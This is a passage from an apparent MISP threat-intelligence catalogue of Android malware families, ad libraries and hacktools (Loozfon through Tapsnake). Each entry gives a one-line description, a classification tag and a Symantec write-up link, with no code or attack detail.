https://www.symantec.com/security_response/writeup.jsp?docid=2012-022002-2431-99

Loozfon

Loozfon is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Loozfon"

Table 281. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-082005-5451-99

Lotoor

Lotoor is a generic detection for hack tools that exploit vulnerabilities in order to gain root privileges on compromised Android devices.

The tag is: misp-galaxy:android="Lotoor"

Table 282. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-091922-4449-99

Lovespy

Lovespy is a Trojan horse for Android devices that steals information from the device.

The tag is: misp-galaxy:android="Lovespy"

Table 283. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071814-3805-99

Lovetrap

Lovetrap is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Lovetrap"

Table 284. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-072806-2905-99

Luckycat

Luckycat is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.

The tag is: misp-galaxy:android="Luckycat"

Table 285. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080617-5343-99

Machinleak

Machinleak is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Machinleak"

Table 286. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-120311-2440-99

Maistealer

Maistealer is a Trojan that steals information from Android devices.

The tag is: misp-galaxy:android="Maistealer"

Table 287. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-072411-4350-99

Malapp

Malapp is a generic detection for many individual but varied threats on Android devices that share similar characteristics.

The tag is: misp-galaxy:android="Malapp"

Table 288. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-073014-3354-99

Malebook

Malebook is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Malebook"

Table 289. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071206-3403-99

Malhome

Malhome is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Malhome"

Table 290. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071118-0441-99

Malminer

Malminer is a Trojan horse for Android devices that mines cryptocurrencies on the compromised device.

The tag is: misp-galaxy:android="Malminer"

Table 291. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032712-3709-99

Mania

Mania is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Mania"

Table 292. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-070623-1520-99

Maxit

Maxit is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals certain information and uploads it to a remote location.

The tag is: misp-galaxy:android="Maxit"

Table 293. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-120411-2511-99

MdotM

MdotM is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MdotM"

Table 294. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5824-99

Medialets

Medialets is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Medialets"

Table 295. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5222-99

Meshidden

Meshidden is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Meshidden"

Table 296. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031913-5257-99

Mesploit

Mesploit is a tool for Android devices used to create applications that exploit the Android Fake ID vulnerability.

The tag is: misp-galaxy:android="Mesploit"

Table 297. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-032014-2847-99

Mesprank

Mesprank is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Mesprank"

Table 298. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030717-1933-99

Meswatcherbox

Meswatcherbox is a spyware application for Android devices that forwards SMS messages without the user knowing.

The tag is: misp-galaxy:android="Meswatcherbox"

Table 299. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-2736-99

Miji

Miji is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Miji"

Table 300. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4720-99

Milipnot

Milipnot is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Milipnot"

Table 301. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-070414-0941-99

MillennialMedia

MillennialMedia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MillennialMedia"

Table 302. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4602-99

Mitcad

Mitcad is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mitcad"

Table 303. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040212-0528-99

MobClix

MobClix is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MobClix"

Table 304. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4011-99

MobFox

MobFox is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MobFox"

Table 305. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-3050-99

Mobidisplay

Mobidisplay is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mobidisplay"

Table 306. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-0435-99

Mobigapp

Mobigapp is a Trojan horse for Android devices that downloads applications disguised as system updates.

The tag is: misp-galaxy:android="Mobigapp"

Table 307. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062520-5802-99

MobileBackup

MobileBackup is a spyware application for Android devices that monitors the affected device.

The tag is: misp-galaxy:android="MobileBackup"

Table 308. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-0040-99

Mobilespy

Mobilespy is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Mobilespy"

Table 309. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071512-0653-99

Mobiletx

Mobiletx is a Trojan horse for Android devices that steals information from the compromised device. It may also send SMS messages to a premium-rate number.

The tag is: misp-galaxy:android="Mobiletx"

Table 310. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-052807-4439-99

Mobinaspy

Mobinaspy is a spyware application for Android devices that can track the device’s location.

The tag is: misp-galaxy:android="Mobinaspy"

Table 311. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-0511-99

Mobus

Mobus is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mobus"

Table 312. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2006-99

MobWin

MobWin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MobWin"

Table 313. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1522-99

Mocore

Mocore is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mocore"

Table 314. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-092112-4603-99

Moghava

Moghava is a Trojan horse for Android devices that modifies images that are stored on the device.

The tag is: misp-galaxy:android="Moghava"

Table 315. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022712-2822-99

Momark

Momark is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Momark"

Table 316. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-5529-99

Monitorello

Monitorello is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Monitorello"

Table 317. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-4737-99

Moolah

Moolah is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Moolah"

Table 318. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1007-99

MoPub

MoPub is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MoPub"

Table 319. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-2456-99

Morepaks

Morepaks is a Trojan horse for Android devices that downloads remote files and may display advertisements on the compromised device.

The tag is: misp-galaxy:android="Morepaks"

Table 320. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071204-1130-99

Nandrobox

Nandrobox is a Trojan horse for Android devices that steals information from the compromised device. It also deletes certain SMS messages from the device.

The tag is: misp-galaxy:android="Nandrobox"

Table 321. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-070212-2132-99

Netisend

Netisend is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Netisend"

Table 322. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-080207-1139-99

Nickispy

Nickispy is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Nickispy"

Table 323. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-072714-3613-99

Notcompatible

Notcompatible is a Trojan horse for Android devices that acts as a proxy.

The tag is: misp-galaxy:android="Notcompatible"

Table 324. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-050307-2712-99

Nuhaz

Nuhaz is a Trojan horse for Android devices that may intercept text messages on the compromised device.

The tag is: misp-galaxy:android="Nuhaz"

Table 325. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-3416-99

Nyearleaker

Nyearleaker is a Trojan horse program for Android devices that steals information.

The tag is: misp-galaxy:android="Nyearleaker"

Table 326. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-010514-0844-99

Obad

Obad is a Trojan horse for Android devices that opens a back door, steals information, and downloads files. It also sends SMS messages to premium-rate numbers and spreads malware to Bluetooth-enabled devices.

The tag is: misp-galaxy:android="Obad"

Table 327. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-060411-4146-99

Oneclickfraud

Oneclickfraud is a Trojan horse for Android devices that attempts to coerce a user into paying for a pornographic service.

The tag is: misp-galaxy:android="Oneclickfraud"

Table 328. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-011205-4412-99

Opfake

Opfake is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers.

The tag is: misp-galaxy:android="Opfake"

Table 329. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-2732-99

Opfake.B

Opfake.B is a Trojan horse for the Android platform that may receive commands from a remote attacker to perform various functions.

The tag is: misp-galaxy:android="Opfake.B"

Table 330. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022406-1309-99

Ozotshielder

Ozotshielder is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Ozotshielder"

Table 331. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-091505-3230-99

Pafloat

Pafloat is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Pafloat"

Table 332. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-2015-99

PandaAds

PandaAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="PandaAds"

Table 333. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1959-99

Pandbot

Pandbot is a Trojan horse for Android devices that may download more files onto the device.

The tag is: misp-galaxy:android="Pandbot"

Table 334. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071215-1454-99

Pdaspy

Pdaspy is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.

The tag is: misp-galaxy:android="Pdaspy"

Table 335. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-0749-99

Penetho

Penetho is a hacktool for Android devices that can be used to crack the WiFi password of the router that the device is using.

The tag is: misp-galaxy:android="Penetho"

Table 336. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-100110-3614-99

Perkel

Perkel is a Trojan horse for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Perkel"

Table 337. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-082811-4213-99

Phimdropper

Phimdropper is a Trojan horse for Android devices that sends and intercepts incoming SMS messages.

The tag is: misp-galaxy:android="Phimdropper"

Table 338. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-021002-2943-99

Phospy

Phospy is a Trojan horse for Android devices that steals confidential information from the compromised device.

The tag is: misp-galaxy:android="Phospy"

Table 339. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-060706-4803-99

Piddialer

Piddialer is a Trojan horse for Android devices that dials premium-rate numbers from the compromised device.

The tag is: misp-galaxy:android="Piddialer"

Table 340. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-111020-2247-99

Pikspam

Pikspam is a Trojan horse for Android devices that sends spam SMS messages from the compromised device.

The tag is: misp-galaxy:android="Pikspam"

Table 341. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-121815-0336-99

Pincer

Pincer is a Trojan horse for Android devices that steals confidential information and opens a back door on the compromised device.

The tag is: misp-galaxy:android="Pincer"

Table 342. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-052307-3530-99

Pirator

Pirator is a Trojan horse on the Android platform that downloads files and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Pirator"

Table 343. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-021609-5740-99

Pjapps

Pjapps is a Trojan horse that has been embedded in third-party applications and opens a back door on the compromised device. It retrieves commands from a remote command and control server.

The tag is: misp-galaxy:android="Pjapps"

Table 344. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-022303-3344-99

Pjapps.B

Pjapps.B is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Pjapps.B"

Table 345. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032014-1624-99

Pletora

Pletora is a Trojan horse for Android devices that may lock the compromised device. It then asks the user to pay in order to unlock the device.

The tag is: misp-galaxy:android="Pletora"

Table 346. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-061217-4345-99

Poisoncake

Poisoncake is a Trojan horse for Android devices that opens a back door on the compromised device. It may also download potentially malicious files and steal information.

The tag is: misp-galaxy:android="Poisoncake"

Table 347. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-010610-0726-99

Pontiflex

Pontiflex is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Pontiflex"

Table 348. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-0946-99

Positmob

Positmob is a Trojan horse program for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Positmob"

Table 349. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111409-1556-99

Premiumtext

Premiumtext is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers. These Trojans will often be repackaged versions of genuine Android software packages, often distributed outside the Android Marketplace.

The tag is: misp-galaxy:android="Premiumtext"

Table 350. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-080213-5308-99

Pris

Pris is a Trojan horse for Android devices that silently downloads a malicious application and attempts to open a back door on the compromised device.

The tag is: misp-galaxy:android="Pris"

Table 351. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-061820-5638-99

Qdplugin

Qdplugin is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Qdplugin"

Table 352. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-102510-3330-99

Qicsomos

Qicsomos is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Qicsomos"

Table 353. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-011007-2223-99

Qitmo

Qitmo is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Qitmo"

Table 354. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030716-4923-99

Rabbhome

Rabbhome is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Rabbhome"

Table 355. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-053007-3750-99

Repane

Repane is a Trojan horse for Android devices that steals information and sends SMS messages from the compromised device.

The tag is: misp-galaxy:android="Repane"

Table 356. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-090411-5052-99

Reputation.1

Reputation.1 is a detection for Android files based on analysis performed by Norton Mobile Insight.

The tag is: misp-galaxy:android="Reputation.1"

Table 357. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-022612-2619-99

Reputation.2

Reputation.2 is a detection for Android files based on analysis performed by Norton Mobile Insight.

The tag is: misp-galaxy:android="Reputation.2"

Table 358. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-2629-99

Reputation.3

Reputation.3 is a detection for Android files based on analysis performed by Norton Mobile Insight.

The tag is: misp-galaxy:android="Reputation.3"

Table 359. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-3126-99

RevMob

RevMob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="RevMob"

Table 360. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040308-0502-99

Roidsec

Roidsec is a Trojan horse for Android devices that steals confidential information.

The tag is: misp-galaxy:android="Roidsec"

Table 361. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-052022-1227-99

Rootcager

Rootcager is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Rootcager"

Table 362. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-030212-1438-99

Rootnik

Rootnik is a Trojan horse for Android devices that steals information and downloads additional apps.

The tag is: misp-galaxy:android="Rootnik"

Rootnik has relationships with:

  • similar: misp-galaxy:malpedia="Rootnik" with estimative-language:likelihood-probability="likely"

Table 363. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2016-062710-0328-99

Rufraud

Rufraud is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Rufraud"

Table 364. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-121306-2304-99

Rusms

Rusms is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.

The tag is: misp-galaxy:android="Rusms"

Table 365. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-061711-5009-99

Samsapo

Samsapo is a worm for Android devices that spreads by sending SMS messages to all contacts stored on the compromised device. It also opens a back door and downloads files.

The tag is: misp-galaxy:android="Samsapo"

Table 366. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-050111-1908-99

Sandorat

Sandorat is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals information.

The tag is: misp-galaxy:android="Sandorat"

Table 367. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-110720-2146-99

Sberick

Sberick is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Sberick"

Table 368. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-071014-2146-99

Scartibro

Scartibro is a Trojan horse for Android devices that locks the compromised device and asks the user to pay in order to unlock it.

The tag is: misp-galaxy:android="Scartibro"

Table 369. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-080718-2038-99

Scipiex

Scipiex is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Scipiex"

Table 370. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-100814-4702-99

Selfmite

Selfmite is a worm for Android devices that spreads through SMS messages.

The tag is: misp-galaxy:android="Selfmite"

Table 371. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-070111-5857-99

Selfmite.B

Selfmite.B is a worm for Android devices that displays ads on the compromised device. It spreads through SMS messages.

The tag is: misp-galaxy:android="Selfmite.B"

Table 372. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-101013-4717-99

SellARing

SellARing is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="SellARing"

Table 373. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-3157-99

SendDroid

SendDroid is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="SendDroid"

Table 374. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-2111-99

Simhosy

Simhosy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Simhosy"

Table 375. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-061013-3955-99

Simplocker

Simplocker is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.

The tag is: misp-galaxy:android="Simplocker"

Table 376. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-060610-5533-99

Simplocker.B

Simplocker.B is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.

The tag is: misp-galaxy:android="Simplocker.B"

Table 377. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-072317-1950-99

Skullkey

Skullkey is a Trojan horse for Android devices that gives the attacker remote control of the compromised device to perform malicious activity.

The tag is: misp-galaxy:android="Skullkey"

Table 378. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-072322-5422-99

Smaato

Smaato is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Smaato"

Table 379. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052622-1755-99

Smbcheck

Smbcheck is a hacktool for Android devices that can trigger a Server Message Block version 2 (SMBv2) vulnerability and may cause the target computer to crash.

The tag is: misp-galaxy:android="Smbcheck"

Table 380. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-5634-99

Smsblocker

Smsblocker is a generic detection for threats on Android devices that block the transmission of SMS messages.

The tag is: misp-galaxy:android="Smsblocker"

Table 381. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-081607-4001-99

Smsbomber

Smsbomber is a program that can be used to send messages to contacts on the device.

The tag is: misp-galaxy:android="Smsbomber"

Table 382. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-112611-5837-99

Smslink

Smslink is a Trojan horse for Android devices that may send malicious SMS messages from the compromised device. It may also display advertisements.

The tag is: misp-galaxy:android="Smslink"

Table 383. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-112600-3035-99

Smspacem

Smspacem is a Trojan horse that may send SMS messages from Android devices.

The tag is: misp-galaxy:android="Smspacem"

Table 384. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-052310-1322-99

SMSReplicator

SMSReplicator is a spying utility that will secretly transmit incoming SMS messages to another phone of the installer’s choice.

The tag is: misp-galaxy:android="SMSReplicator"

Table 385. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2010-110214-1252-99

Smssniffer

Smssniffer is a Trojan horse that intercepts SMS messages on Android devices.

The tag is: misp-galaxy:android="Smssniffer"

Table 386. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071108-3626-99

Smsstealer

Smsstealer is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Smsstealer"

Table 387. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-121514-0214-99

Smstibook

Smstibook is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Smstibook"

Table 388. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-051207-4833-99

Smszombie

Smszombie is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Smszombie"

Table 389. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-082011-0922-99

Snadapps

Snadapps is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Snadapps"

Table 390. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071807-3111-99

Sockbot

Sockbot is a Trojan horse for Android devices that creates a SOCKS proxy on the compromised device.

The tag is: misp-galaxy:android="Sockbot"

Table 391. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2017-101314-1353-99

Sockrat

Sockrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Sockrat"

Sockrat has relationships with:

  • similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 392. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-110509-4646-99

Sofacy

Sofacy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Sofacy"

Sofacy has relationships with:

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

Table 393. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2017-010508-5201-99

Sosceo

Sosceo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Sosceo"

Table 394. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040408-0609-99

Spitmo

Spitmo is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Spitmo"

Table 395. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-091407-1435-99

Spitmo.B

Spitmo.B is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Spitmo.B"

Table 396. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-0445-99

Spyagent

Spyagent is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.

The tag is: misp-galaxy:android="Spyagent"

Table 397. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-090710-1836-99

Spybubble

Spybubble is a spyware application for Android devices that logs the device’s activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Spybubble"

Table 398. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-121917-0335-99

Spydafon

Spydafon is a Potentially Unwanted Application for Android devices that monitors the affected device.

The tag is: misp-galaxy:android="Spydafon"

Table 399. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030722-4740-99

Spymple

Spymple is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Spymple"

Table 400. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-5403-99

Spyoo

Spyoo is a spyware program for Android devices that records and sends certain information to a remote location.

The tag is: misp-galaxy:android="Spyoo"

Table 401. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-081709-0457-99

Spytekcell

Spytekcell is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Spytekcell"

Table 402. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-121021-0730-99

Spytrack

Spytrack is a spyware program for Android devices that periodically sends certain information to a remote location.

The tag is: misp-galaxy:android="Spytrack"

Table 403. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080109-5710-99

Spywaller

Spywaller is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Spywaller"

Table 404. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-121807-0203-99

Stealthgenie

Stealthgenie is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Stealthgenie"

Table 405. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-111416-1306-99

Steek

Steek is a potentially unwanted application that is placed on a download website for Android applications and disguised as popular applications.

The tag is: misp-galaxy:android="Steek"

Table 406. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-010911-3142-99

Stels

Stels is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Stels"

Table 407. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-032910-0254-99

Stiniter

Stiniter is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Stiniter"

Table 408. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-030903-5228-99

Sumzand

Sumzand is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Sumzand"

Table 409. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080308-2851-99

Sysecsms

Sysecsms is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Sysecsms"

Table 410. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-122714-5228-99

Tanci

Tanci is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tanci"

Table 411. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4108-99

Tapjoy

Tapjoy is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tapjoy"

Table 412. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-4702-99

Tapsnake

